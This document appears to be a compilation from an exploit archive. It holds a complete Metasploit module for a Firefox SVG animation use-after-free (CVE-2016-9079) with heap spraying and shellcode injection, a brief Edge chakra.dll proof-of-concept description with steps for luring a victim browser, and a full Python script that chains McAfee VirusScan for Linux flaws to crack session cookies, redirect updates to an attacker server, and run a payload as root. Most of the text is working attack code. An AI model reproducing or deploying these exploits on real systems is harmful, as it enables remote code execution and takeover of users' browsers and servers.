Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::HttpServer
    def initialize(info={})
      super(update_info(info,
        'Name'           => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
        'Description'    => %q{
          This module exploits an out-of-bounds indexing/use-after-free condition present in
          nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
          on Microsoft Windows.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
          [
            'Anonymous Gaijin',                                 # Original research/exploit
            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
          ],
          'Platform'       => 'win',
          'Targets'        =>
          [
            [ 'Mozilla Firefox',
              {
                'Platform' => 'win',
                'Arch'     => ARCH_X86,
              }
            ],
          ],
          'DefaultOptions'  =>
          {
            'EXITFUNC' => "thread",
            'InitialAutoRunScript' => 'migrate -f'
          },
          'References'     =>
          [
            [ 'CVE', '2016-9079' ],
            [ 'Bugzilla', '1321066' ]
          ],
          'Arch'           => ARCH_X86,
          'DisclosureDate' => "Nov 30 2016",
          'DefaultTarget'  => 0
        )
      )
    register_options(
      [
        OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation.  NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
      ], self.class
    )
  end
  def exploit_html(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
    base_uri = "#{get_resource.chomp('/')}"
    # stuff that gets adjusted alot during testing
    defrag_x = %Q~
       for (var i = 0; i < 0x4000; i++)
         heap80[i] = block80.slice(0)
     ~
     defrag_y = %Q~
       for (var i = 0x4401; i < heap80.length; i++)
         heap80[i] = block80.slice(0)
     ~
    js = %Q~
    var worker = new Worker('#{base_uri}/worker.js');
    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x5000);
    var heap100 = new Array(0x5000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;
    var animateX = undefined;
    var containerA = undefined;
    var milestone_offset = 0x90;
    var $ = function(id) { return document.getElementById(id); }
    var heap = function()
    {
     var u32 = new Uint32Array(block80)
     u32[4] = arrBase - milestone_offset;
     u32[0xa] = arrBase + 0x1000 - milestone_offset;
     u32[0x10] = arrBase + 0x2000 - milestone_offset;
     var x = document.createElementNS(svgns, 'animate')
     var svg = document.createElementNS(svgns, 'svg')
     svg.appendChild(x)
     svg.appendChild(x.cloneNode(true))
     for (var i = 0; i < 0x400; i++)
       {
         var node = svg.cloneNode(true);
         node.setAttribute('id', 'svg' + i)
         document.body.appendChild(node);
       }
       #{defrag_x}
       for (var i = 0; i < 0x400; i++)
         {
           heap80[i + 0x3000] = block80.slice(0)
           $('svg' + i).appendChild(x.cloneNode(true))
         }
         for (var i = 0; i < 0x400; i++)
           {
             $('svg' + i).appendChild(x.cloneNode(true))
             $('svg' + i).appendChild(x.cloneNode(true))
           }
           for (var i = 0; i < heap100.length; i++)
             heap100[i] = block100.slice(0)
             #{defrag_y}
             for (var i = 0x100; i < 0x400; i++)
               $('svg' + i).appendChild(x.cloneNode(true))
             }
             var exploit = function()
             {
               heap();
               animateX.setAttribute('begin', '59s')
               animateX.setAttribute('begin', '58s')
               animateX.setAttribute('begin', '10s')
               animateX.setAttribute('begin', '9s')
               // money shot
               containerA.pauseAnimations();
             }
             worker.onmessage = function(e)
             {
              worker.onmessage = function(e)
              {
               window.setTimeout(function()
               {
                 worker.terminate();
                 document.body.innerHTML = '';
                 document.getElementsByTagName('head')[0].innerHTML = '';
                 document.body.setAttribute('onload', '')
                 document.write('<blink>')
                 }, 1000);
  }
  arrBase = e.data;
  exploit();
  }
  var idGenerator = function()
  {
   return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
  }
  var craftDOM = function()
  {
   containerA = document.createElementNS(svgns, 'svg')
   var containerB = document.createElementNS(svgns, 'svg');
   animateX = document.createElementNS(svgns, 'animate')
   var animateA = document.createElementNS(svgns, 'animate')
   var animateB = document.createElementNS(svgns, 'animate')
   var animateC = document.createElementNS(svgns, 'animate')
   var idX = idGenerator();
   var idA = idGenerator();
   var idB = idGenerator();
   var idC = idGenerator();
   animateX.setAttribute('id', idX);
   animateA.setAttribute('id', idA);
   animateA.setAttribute('end', '50s');
   animateB.setAttribute('id', idB);
   animateB.setAttribute('begin', '60s');
   animateB.setAttribute('end', idC + '.end');
   animateC.setAttribute('id', idC);
   animateC.setAttribute('begin', '10s');
   animateC.setAttribute('end', idA + '.end');
   containerA.appendChild(animateX)
   containerA.appendChild(animateA)
   containerA.appendChild(animateB)
   containerB.appendChild(animateC)
   document.body.appendChild(containerA);
   document.body.appendChild(containerB);
  }
  window.onload = craftDOM;
    ~
    # If you want to change the appearance of the landing page, do it here
    html = %Q~
    <html>
    <head>
    <meta charset="utf-8"/>
    <script>
    #{js}
    </script>
    </head>
    <body>
    </body>
    </html>
    ~
    if datastore['UsePostHTML']
      f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
      c = f.read
      html = html.gsub("<blink>", c)
    else
      html = html.gsub("<blink>", "")
    end
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  def worker_js(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload = Rex::Text.to_unescape(p, arch)
    wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
    c = wt.read
    c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
    c = c.gsub("NOPSGOHERE", "\u9090")
    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  def is_ff_on_windows(user_agent)
    target_hash = fingerprint_user_agent(user_agent)
    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
      return false
    end
      return true
  end
  def on_request_uri(cli, request)
    print_status("Got request: #{request.uri}")
    print_status("From: #{request.headers['User-Agent']}")
    if (!is_ff_on_windows(request.headers['User-Agent']))
      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
      send_not_found(cli)
      close_client(cli)
      return
    end
    if request.uri =~ /worker\.js/
      print_status("Sending worker thread Javascript ...")
      worker_js(cli)
      return
    end
    if request.uri =~ /index\.html/ or request.uri =~ /\//
      print_status("Sending exploit HTML ...")
      exploit_html(cli)
      close_client(cli)
      return
    end
  end
end

Microsoft Edge (Windows 10) – ‘chakra.dll’ Info Leak / Type

Author: Brian Pak
Source: https://github.com/theori-io/chakra-2016-11
Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip
chakra.dll Info Leak + Type Confusion for RCE
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
Tested on Windows 10 Edge (modern.ie stable).
FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
To run:
Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.

Remote Exploit McAfee Virus Scan Enterprise for Linux

'''
Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chaned together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128'                 # Attacker IP for victim to connect back to
authorized_ip="127.0.0.1"           # IP address cookie will be valid for
update_server_port = 8080               # Port update server listens on
delay_seconds = 10                      # How long should the server take to serve the update
target_port = 55443                 # Port to target
# Put payload script in payload.sh
# Initialization
payload_in_place = threading.Event()
requests.packages.urllib3.disable_warnings()
with open("payload.sh", "r") as f:
    payload = f.read()
def pprint(inp, flag=False):
    pad = "#"
    if flag:
        pad = "*"
    print("\n" + pad+ " " + inp)
def crack_cookie():
    pprint("Cracking Cookie")
    # A page that requires authentication
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
    # Start at the current time + 100 in case of recent login with clock skew
    date_val = int(time.time()+100)
    cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
    # Make requests, print after every 600
    while True:
        cookie = cookie_fmt % date_val
        req_cookie = {"nailsSessionId": cookie}
        r = requests.get(url, cookies=req_cookie, verify=False)
        r.raise_for_status()
        if "Set-Cookie" in r.headers:
            valid_cookie = cookie
            timestamp = cookie.split("/")[3].split("-")[0]
            break
        elif date_val % 600 == 0:
            print("Now trying  %s" % time.asctime(time.localtime(date_val)))
        date_val -= 1
    pprint("Cookie Cracked: " + timestamp, True)
    return valid_cookie
def update_update_server(auth_cookie):
    pprint("Updating update server")
    # Replace McAfeeHttp update server with attacker local_ip:update_server_port
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
    "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
    "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
    "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
    "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
    "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
    "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
    "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
    + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
    "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
    "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
    "eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
    "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
    "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
    "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
    "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
    "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
    "posProperty=fallback&useOfProxy=on"
    r = requests.get(url, cookies=auth_cookie, verify=False)
    r.raise_for_status()
    pprint("Updated update server", True)
def download_update(req_cookie):
    pprint("Requesting target download payload")
    # Send request to make target download payload
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    updateName = "update_%d" % int(time.time())
    postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
    "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
    "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
    "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
    "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
    "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
    "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
    "Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
    pprint("Making target execute payload")
    #### Get commit_id and ODS_name
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
    ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
    "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
    "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
    ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
    "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
    r = requests.get(url, cookies=req_cookie, verify=False)
    r.raise_for_status()
    regex = re.search("\|digest=(.+?)\|", r.text)
    if not regex:
        print("\nERROR: Could not get commit_id when generating evil scan\n")
        return False
    commit_id = regex.groups(1)[0]
    # Send request to start evil scan
    payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
    binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    ODS_name = "ODS_1"   # This may need to be increased if the name already exists
    scan_name = "scan_%s" % str(int(time.time()))
    postdata =  ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
    "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
    "ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
    "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
    ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
    "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
    "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
    "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
    "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
    "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
    "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
    "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
    "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
    "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
    "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
    "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
    "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
    ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
    "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
    "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
    ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
    "on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
    "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
    "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
    "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
    "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
    "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
    "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
    "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
    "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload executed", 1)
def start_update_server():
    class RequestHandler(BaseHTTPRequestHandler):
        def do_HEAD(s):
            s.send_response(200)
            s.send_header("Content-type", "text/html")
            s.end_headers()
        def do_GET(s):
            if s.path == "/catalog.z":
                s.send_response(200)
                s.send_header("Content-type", "text/html")
                s.end_headers()
                s.wfile.write(bytes(payload, "utf-8"))
                pprint("Payload placed", 1)
                payload_in_place.set()
                # Die after sending payload so we send an incomplete response
                raise KillServer
            else: # Assume all other requests are for SiteStat - Always increasing version
                s.send_response(200)
                s.send_header("Content-type", "text/xml")
                s.end_headers()
                s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
                """<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
                """ </SiteStatus>""") % int(time.time()), "utf-8"))
    # Throwing KillServer will shutdown the server ungracefully
    class KillServer(Exception):
        def __str__(self):
            return "Kill Server (not an error)"
    # ThreadingMixIn plus support for KillServer exceptions
    class AbortableThreadingMixIn(ThreadingMixIn):
        def process_request_thread(self, request, client_address):
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
            except KillServer:
                pprint("Killing update server dirtily")
                self.shutdown_request(request)
                self.shutdown() # Only if we want to shutdown
            except:
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
        pass
    pprint("Launching update server")
    srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
    threading.Thread(target=srv.serve_forever).start()
    pprint("Update server started", 1)
    return srv
####################################################################################
####################################################################################
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target downloads our payload,
payload_in_place.wait()
# Shutdown our update server
srv.shutdown()
# Execute /bin/sh -(?) catalog.z
exec_catalogz(auth_cookie)